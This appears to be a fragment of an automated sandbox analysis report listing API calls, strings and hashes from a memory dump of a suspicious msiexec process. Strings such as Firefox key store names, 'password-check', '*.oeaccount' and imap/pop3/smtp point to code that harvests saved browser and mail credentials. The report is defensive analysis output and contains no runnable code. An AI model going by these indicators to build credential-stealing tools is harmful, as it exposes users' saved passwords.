                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                      • String ID: key3.db$key4.db
                                                                                                      • API String ID: 581844971-3557030128
                                                                                                      • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                      • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                      • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                      • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                      • String ID: %s (%s)
                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                      APIs
                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                      • String ID: pw/h
                                                                                                      • API String ID: 1189762176-1253101650
                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                      APIs
                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                      Strings
                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                      • API String ID: 1640410171-3316789007
                                                                                                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 125969286-791839006
                                                                                                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                      APIs
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 82305771-620537770
                                                                                                      • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                      • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                      • String ID: caption$dialog_%d
                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                      Strings
                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                      • API String ID: 3510742995-3035234601
                                                                                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      • API String ID: 2221118986-3608744896
                                                                                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                      • API String ID: 1784268899-4153596280
                                                                                                      • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                      • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                      • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                      • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3974772901-0
                                                                                                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 577244452-0
                                                                                                      • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                      • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                      • String ID: imap$pop3$smtp
                                                                                                      • API String ID: 2025310588-821077329
                                                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1786725549-0
                                                                                                      • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                      • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: global-salt$password-check
                                                                                                      • API String ID: 231171946-3927197501
                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                      • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 19018683-0
                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040644F
